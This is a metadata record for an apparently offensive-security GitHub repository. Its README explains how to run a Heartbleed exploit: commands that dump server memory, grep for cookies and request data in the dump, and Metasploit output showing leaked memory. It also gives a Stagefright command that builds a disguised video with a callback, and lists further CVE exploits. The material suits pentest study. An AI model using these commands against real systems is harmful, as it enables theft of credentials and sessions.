{"id":19724068,"url":"https://github.com/vs4vijay/exploits","last_synced_at":"2025-04-29T22:31:12.411Z","repository":{"id":15891398,"uuid":"18632692","full_name":"vs4vijay/exploits","owner":"vs4vijay","description":"Exploits R\u0026D","archived":false,"fork":false,"pushed_at":"2024-05-25T19:50:19.000Z","size":3034,"stargazers_count":19,"open_issues_count":0,"forks_count":10,"subscribers_count":2,"default_branch":"master","last_synced_at":"2025-04-05T20:05:24.431Z","etag":null,"topics":["blueducky","bluekeep","buffer-overflow","c99","cve","exploit","exploits","heap-overflow","heartbleed","infosec","lpe","pentest","pentesting","poc","rce","red-team","security","shell","stack-overflow"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/vs4vijay.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"security-pocs/README","support":null}},"created_at":"2014-04-10T10:33:20.000Z","updated_at":"2024-12-18T16:58:16.000Z","dependencies_parsed_at":"2022-09-19T10:51:07.974Z","dependency_job_id":null,"html_url":"https://github.com/vs4vijay/exploits","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vs4vijay%2Fexploits","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vs4vijay%2Fexploits/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vs4vijay%2Fexploits/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vs4vijay%2Fexploits/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/vs4vijay","download_url":"https://codeload.github.com/vs4vijay/exploits/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":251593010,"owners_count":21614455,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["blueducky","bluekeep","buffer-overflow","c99","cve","exploit","exploits","heap-overflow","heartbleed","infosec","lpe","pentest","pentesting","poc","rce","red-team","security","shell","stack-overflow"],"created_at":"2024-11-11T23:24:24.042Z","updated_at":"2025-04-29T22:31:11.994Z","avatar_url":"https://github.com/vs4vijay.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"Exploits\n--------\n\nExploits R\u0026D\n\n\n\n# HeartBleed Exploit\n\n## Tool Guide\n\n\n* If you want to mass scan, the NMAP script is currently your best bet.\n* For the largest number of protocols supports (STARTTLS) check the modified Metasploit script\n* If you want to actually exploit, use the python script (mods required for STARTTLS on non-smtp)\n\n\nUsage: heartbleed-poc.py server [options]\n\nTest for SSL heartbeat vulnerability (CVE-2014-0160)\n\nOptions:\n  -h, --help            show this help message and exit\n  -p PORT, --port=PORT  TCP port to test (default: 443)\n  -n NUM, --num=NUM     Number of heartbeats to send if vulnerable (defines\n                        how much memory you get back) (default: 1)\n  -f FILE, --file=FILE  Filename to write dumped memory too (default:\n                        dump.bin)\n  -q, --quiet           Do not display the memory dump\n  -s, --starttls        Check STARTTLS (smtp only right now)\n\nExamples\n\n* Normal scan, will hit port 443, with 1 iteration:\npython heartbleed-poc.py example.com\n\n* Dump memory scan, will make 100 request and put the output in the binary file dump.bin:\npython heartbleed-poc.py -n100 -f dump.bin example.com\n\nThe make sure you get different parts of the HEAP, make sure the server is busy, or you end up with repeat repeat.\n\n* Check a mail server with STARTTLS (i.e. port 25):\npython heartbleed-poc.py -s -p 25 example.com\n\n* There used to be a -v switch to make the TLS version explicit, this is auto-detected now and has been removed\n\n### Find Juice\n\nThe binary file will have juicy output in it, here are some simple ways of finding the goods:\n\n* HTTP request:\nawk '/[HPG][UEO][AST][DT ]/,/Connection/' dump.bin\n\n* Cookies:\ngrep -a \"^Cookie:\" dump.bin\n\n* Interesting Key Value Pairs:\npcregrep -ao \"[A-Za-z0-9_-]+=[0-9a-zA-Z]+\" dump.bin\n\n### NMAP NSE Script\n\n\nUsage:\nnmap --script=ssl-heartbleed -p 443 \u003cserver\u003e\n\nExample Output:\n\nStarting Nmap 6.41SVN ( http://nmap.org ) at 2014-04-09 17:27 SAST\nNmap scan report for \u003cexample.org\u003e (1.2.3.4)\nHost is up (0.0068s latency).\nPORT    STATE SERVICE\n443/tcp open  https\n| ssl-heartbleed: \n|   VULNERABLE:\n|   The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.\n|     State: VULNERABLE\n|     Risk factor: High\n|     Description:\n|       OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.\n|       \n|     References:\n|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160\n|       http://www.openssl.org/news/secadv_20140407.txt \n|_      http://cvedetails.com/cve/2014-0160/\n\nNmap done: 1 IP address (1 host up) scanned in 0.23 seconds\n\n### Metasploit Module\n\nmsf \u003e use auxiliary/scanner/ssl/openssl_heartbleed \nmsf auxiliary(openssl_heartbleed) \u003e show options\n\nModule options (auxiliary/scanner/ssl/openssl_heartbleed):\n\n   Name        Current Setting  Required  Description\n   ----        ---------------  --------  -----------\n   RHOSTS                       yes       The target address range or CIDR identifier\n   RPORT       443              yes       The target port\n   STARTTLS    None             yes       Protocol to use with STARTTLS, None to avoid STARTTLS  (accepted: None, SMTP, IMAP, JABBER, POP3, FTP)\n   THREADS     1                yes       The number of concurrent threads\n   TLSVERSION  1.0              yes       TLS version to use (accepted: 1.0, 1.1, 1.2)\n\nmsf auxiliary(openssl_heartbleed) \u003e set rhosts example.org\nrhosts =\u003e example.org\nmsf auxiliary(openssl_heartbleed) \u003e set STARTTLS FTP\nSTARTTLS =\u003e FTP\nmsf auxiliary(openssl_heartbleed) \u003e set PORT 21\nPORT =\u003e 21\nmsf auxiliary(openssl_heartbleed) \u003e exploit\n\n[*] 37.187.134.197:21 - Trying to start SSL via FTP\n[*] 37.187.134.197:21 - Sending Client Hello...\n[*] 37.187.134.197:21 - Sending Heartbeat...\n[*] 37.187.134.197:21 - Heartbeat response, checking if there is data leaked...\n[+] 37.187.134.197:21 - Heartbeat response with leak\n[*] 37.187.134.197:21 - Printable info leaked: @SE F(CKMIWsf\"!98532ED/A\n[*] Scanned 1 of 1 hosts (100% complete)\n[*] Auxiliary module execution completed\n\n---\n\n# Stagefright Exploit\n\n```bash\nstagefright_2.py -c 192.168.1.2 -p 444 -o PrankVideo.mp4`\n```\n\n---\n\n### Development Notes\n\n```bash\n\nCVE-2020-17382\n\nCVE-2023-45866-BlueDucky\ngit submodule add https://github.com/pentestfunctions/BlueDucky CVE-2023-45866-BlueDucky/BlueDucky\n\nCVE-2020-1472-Zerologon\n\nCVE-2021-44228-Log4j\n\nCVE-2019-0708-BlueKeep\n\nCVE-2020-16898-Bad-Neighbor\n\nCVE-2020-0796-SMB-Ghost\n\nRPC DCOM\n\nhttps://github.com/nomi-sec/PoC-in-GitHub\n\nhttps://github.com/swisskyrepo/PayloadsAllTheThings\n\nhttps://github.com/liamg/traitor\n\nhttps://github.com/S3cur3Th1sSh1t/WinPwn\n\nhttps://github.com/The-Z-Labs/linux-exploit-suggester\n\n```","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fvs4vijay%2Fexploits","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fvs4vijay%2Fexploits","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fvs4vijay%2Fexploits/lists"}